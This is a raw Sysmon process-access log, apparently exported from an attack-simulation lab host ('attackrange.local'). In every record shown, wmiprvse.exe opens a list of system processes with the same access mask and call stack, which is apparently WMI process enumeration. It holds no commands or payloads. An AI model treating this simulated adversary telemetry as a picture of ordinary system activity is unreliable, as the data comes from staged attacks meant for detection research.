15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023378Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023377Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023376Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023375Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.195{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023374Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023373Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023372Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023371Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023370Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023369Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023368Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023367Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023366Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023365Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 